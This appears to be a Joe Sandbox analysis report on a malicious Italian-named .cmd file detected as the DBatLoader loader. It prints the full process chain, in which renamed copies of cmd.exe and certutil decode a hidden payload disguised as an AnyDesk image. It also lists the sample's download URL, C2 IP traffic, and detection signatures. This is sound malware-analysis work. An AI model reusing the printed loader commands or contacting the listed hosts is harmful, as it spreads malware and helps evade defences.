Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Documentazione_Doganale_richieste_di_copia.cmd

Overview

General Information

Sample name:Documentazione_Doganale_richieste_di_copia.cmd
Analysis ID:1562927
MD5:e83eaefa47746764ed0708da11cf890f
SHA1:5986d2e1da1d6fa42825ae627ee688cac4530fd7
SHA256:13e2c237c2fa5b146ada50ad1be0be71832e42b745f2bc82daa52558807a7aa6
Tags:cmddoganalecmduser-JAMESWT_MHT
Infos:

Detection

DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Yara detected DBatLoader
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Registers a new ROOT certificate
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7408 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 7464 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7488 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 7504 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7524 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7540 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 7568 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7584 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • AnyDesk.PIF (PID: 7640 cmdline: C:\Users\Public\Libraries\AnyDesk.PIF MD5: BCEEA9753420A675AF68CDA43864438E)
    • alpha.exe (PID: 7656 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7672 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://vandeytas.ru.com/233_Hlvzmhuinff"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000003.1720758818.000000007F880000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    9.2.AnyDesk.PIF.2b60000.0.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Execution from Suspicious Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7408, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7488, ProcessName: alpha.exe
      Sigma detected: Parent in Public Folder Suspicious Process
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 7488, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7504, ProcessName: extrac32.exe
      Sigma detected: Suspicious Program Location with Network Connections
      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 50.7.187.218, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\AnyDesk.PIF, Initiated: true, ProcessId: 7640, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
      Sigma detected: Execution of Suspicious File Type Extension
      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\AnyDesk.PIF, NewProcessName: C:\Users\Public\Libraries\AnyDesk.PIF, OriginalFileName: C:\Users\Public\Libraries\AnyDesk.PIF, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7408, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 7640, ProcessName: AnyDesk.PIF

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-26T09:38:48.563344+010020283713Unknown Traffic192.168.2.44973150.7.187.218443TCP
      2024-11-26T09:38:50.754265+010020283713Unknown Traffic192.168.2.44973350.7.187.218443TCP
      2024-11-26T09:38:52.954772+010020283713Unknown Traffic192.168.2.44973550.7.187.218443TCP
      2024-11-26T09:38:55.168909+010020283713Unknown Traffic192.168.2.44973750.7.187.218443TCP
      2024-11-26T09:38:57.281145+010020283713Unknown Traffic192.168.2.44973950.7.187.218443TCP
      2024-11-26T09:38:59.839817+010020283713Unknown Traffic192.168.2.44974150.7.187.218443TCP
      2024-11-26T09:39:02.030386+010020283713Unknown Traffic192.168.2.44974450.7.187.218443TCP
      2024-11-26T09:39:04.491017+010020283713Unknown Traffic192.168.2.44974850.7.187.218443TCP
      2024-11-26T09:39:06.616914+010020283713Unknown Traffic192.168.2.44975250.7.187.218443TCP
      2024-11-26T09:39:08.762801+010020283713Unknown Traffic192.168.2.44975550.7.187.218443TCP
      2024-11-26T09:39:10.894037+010020283713Unknown Traffic192.168.2.44975750.7.187.218443TCP
      2024-11-26T09:39:12.993224+010020283713Unknown Traffic192.168.2.44975950.7.187.218443TCP
      2024-11-26T09:39:15.086047+010020283713Unknown Traffic192.168.2.44976150.7.187.218443TCP
      2024-11-26T09:39:17.307750+010020283713Unknown Traffic192.168.2.44976350.7.187.218443TCP
      2024-11-26T09:39:19.539915+010020283713Unknown Traffic192.168.2.44976550.7.187.218443TCP
      2024-11-26T09:39:21.686683+010020283713Unknown Traffic192.168.2.44976750.7.187.218443TCP
      2024-11-26T09:39:23.870915+010020283713Unknown Traffic192.168.2.44976950.7.187.218443TCP
      2024-11-26T09:39:26.009878+010020283713Unknown Traffic192.168.2.44977150.7.187.218443TCP
      2024-11-26T09:39:28.366489+010020283713Unknown Traffic192.168.2.44977350.7.187.218443TCP
      2024-11-26T09:39:30.558807+010020283713Unknown Traffic192.168.2.44977550.7.187.218443TCP
      2024-11-26T09:39:32.727424+010020283713Unknown Traffic192.168.2.44977750.7.187.218443TCP
      2024-11-26T09:39:34.821873+010020283713Unknown Traffic192.168.2.44977950.7.187.218443TCP
      2024-11-26T09:39:36.950461+010020283713Unknown Traffic192.168.2.44978150.7.187.218443TCP
      2024-11-26T09:39:39.147343+010020283713Unknown Traffic192.168.2.44978350.7.187.218443TCP
      2024-11-26T09:39:41.275676+010020283713Unknown Traffic192.168.2.44978550.7.187.218443TCP
      2024-11-26T09:39:43.417014+010020283713Unknown Traffic192.168.2.44978950.7.187.218443TCP
      2024-11-26T09:39:45.739224+010020283713Unknown Traffic192.168.2.44979650.7.187.218443TCP
      2024-11-26T09:39:47.925418+010020283713Unknown Traffic192.168.2.44980350.7.187.218443TCP
      2024-11-26T09:39:50.066597+010020283713Unknown Traffic192.168.2.44981050.7.187.218443TCP
      2024-11-26T09:39:52.161402+010020283713Unknown Traffic192.168.2.44981750.7.187.218443TCP
      2024-11-26T09:39:54.280482+010020283713Unknown Traffic192.168.2.44982450.7.187.218443TCP
      2024-11-26T09:39:56.417637+010020283713Unknown Traffic192.168.2.44983150.7.187.218443TCP
      2024-11-26T09:39:58.550142+010020283713Unknown Traffic192.168.2.44983850.7.187.218443TCP
      2024-11-26T09:40:00.801176+010020283713Unknown Traffic192.168.2.44984550.7.187.218443TCP
      2024-11-26T09:40:02.950972+010020283713Unknown Traffic192.168.2.44985250.7.187.218443TCP
      2024-11-26T09:40:05.091745+010020283713Unknown Traffic192.168.2.44985950.7.187.218443TCP
      2024-11-26T09:40:07.254696+010020283713Unknown Traffic192.168.2.44986650.7.187.218443TCP
      2024-11-26T09:40:09.425427+010020283713Unknown Traffic192.168.2.44987050.7.187.218443TCP
      2024-11-26T09:40:11.592526+010020283713Unknown Traffic192.168.2.44987650.7.187.218443TCP
      2024-11-26T09:40:13.726668+010020283713Unknown Traffic192.168.2.44988150.7.187.218443TCP
      2024-11-26T09:40:15.936904+010020283713Unknown Traffic192.168.2.44988750.7.187.218443TCP
      2024-11-26T09:40:18.061957+010020283713Unknown Traffic192.168.2.44989450.7.187.218443TCP
      2024-11-26T09:40:20.180941+010020283713Unknown Traffic192.168.2.44990050.7.187.218443TCP
      2024-11-26T09:40:22.438790+010020283713Unknown Traffic192.168.2.44990750.7.187.218443TCP
      2024-11-26T09:40:24.742215+010020283713Unknown Traffic192.168.2.44991450.7.187.218443TCP
      2024-11-26T09:40:26.861374+010020283713Unknown Traffic192.168.2.44992150.7.187.218443TCP
      2024-11-26T09:40:29.007334+010020283713Unknown Traffic192.168.2.44992850.7.187.218443TCP
      2024-11-26T09:40:31.208417+010020283713Unknown Traffic192.168.2.44993550.7.187.218443TCP
      2024-11-26T09:40:33.341234+010020283713Unknown Traffic192.168.2.44994250.7.187.218443TCP
      2024-11-26T09:40:35.405275+010020283713Unknown Traffic192.168.2.44994950.7.187.218443TCP
      2024-11-26T09:40:37.498236+010020283713Unknown Traffic192.168.2.44995550.7.187.218443TCP
      2024-11-26T09:40:39.661000+010020283713Unknown Traffic192.168.2.44996250.7.187.218443TCP
      2024-11-26T09:40:42.015913+010020283713Unknown Traffic192.168.2.44996950.7.187.218443TCP
      2024-11-26T09:40:44.180953+010020283713Unknown Traffic192.168.2.44997650.7.187.218443TCP
      2024-11-26T09:40:46.387362+010020283713Unknown Traffic192.168.2.44998350.7.187.218443TCP
      2024-11-26T09:40:48.493864+010020283713Unknown Traffic192.168.2.44999050.7.187.218443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Found malware configuration
      Source: 9.0.AnyDesk.PIF.400000.0.unpackMalware Configuration Extractor: DBatLoader {"Download Url": ["https://vandeytas.ru.com/233_Hlvzmhuinff"]}
      Multi AV Scanner detection for dropped file
      Source: C:\Users\Public\Libraries\AnyDesk.PIFReversingLabs: Detection: 68%
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C2F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,6_2_00007FF67C4C2F38
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C2C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,6_2_00007FF67C4C2C2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50DD80 CertFindExtension,CryptDecodeObject,6_2_00007FF67C50DD80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C565D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,6_2_00007FF67C565D80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E5DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,6_2_00007FF67C4E5DA1
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C533D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,6_2_00007FF67C533D60
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5B5D74 CryptDecodeObjectEx,strcmp,strcmp,6_2_00007FF67C5B5D74
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C509D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C509D6C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C511D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,6_2_00007FF67C511D70
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C587D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,6_2_00007FF67C587D3C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58BD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,6_2_00007FF67C58BD3C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C541E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,6_2_00007FF67C541E2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E5DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,6_2_00007FF67C4E5DF7
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C1DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,6_2_00007FF67C4C1DE8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50DEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,6_2_00007FF67C50DEA4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53DEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,6_2_00007FF67C53DEB0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57DE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,6_2_00007FF67C57DE70
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5B5E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,6_2_00007FF67C5B5E3C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5B5F20 CryptDecodeObjectEx,6_2_00007FF67C5B5F20
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C507F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,6_2_00007FF67C507F14
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C545F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,6_2_00007FF67C545F04
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C587EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,6_2_00007FF67C587EE8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C555FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,6_2_00007FF67C555FA8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C559F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,6_2_00007FF67C559F90
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4EFF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,6_2_00007FF67C4EFF64
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C525F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,6_2_00007FF67C525F54
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5B5FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,6_2_00007FF67C5B5FF0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E5FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,6_2_00007FF67C4E5FE8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C524070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,6_2_00007FF67C524070
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57E044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,6_2_00007FF67C57E044
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E60DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,6_2_00007FF67C4E60DA
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E7988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,6_2_00007FF67C4E7988
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5AB980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,6_2_00007FF67C5AB980
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,6_2_00007FF67C53597C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C579970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,6_2_00007FF67C579970
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50F944 CryptDecodeObject,GetLastError,#357,6_2_00007FF67C50F944
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53B950 I_CryptGetLruEntryData,#357,6_2_00007FF67C53B950
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58BA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,6_2_00007FF67C58BA14
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DF9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,6_2_00007FF67C4DF9B8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53B9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,6_2_00007FF67C53B9CC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5B5AA8 CryptDecodeObjectEx,6_2_00007FF67C5B5AA8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57FA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,6_2_00007FF67C57FA84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C569A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,6_2_00007FF67C569A58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E3A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C4E3A40
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C557A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF67C557A70
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C551A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,6_2_00007FF67C551A44
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C56BA50 CryptSignCertificate,SetLastError,6_2_00007FF67C56BA50
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C549AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,6_2_00007FF67C549AF8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C513B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,6_2_00007FF67C513B14
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DBB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,6_2_00007FF67C4DBB80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5B5B90 CryptDecodeObjectEx,memmove,6_2_00007FF67C5B5B90
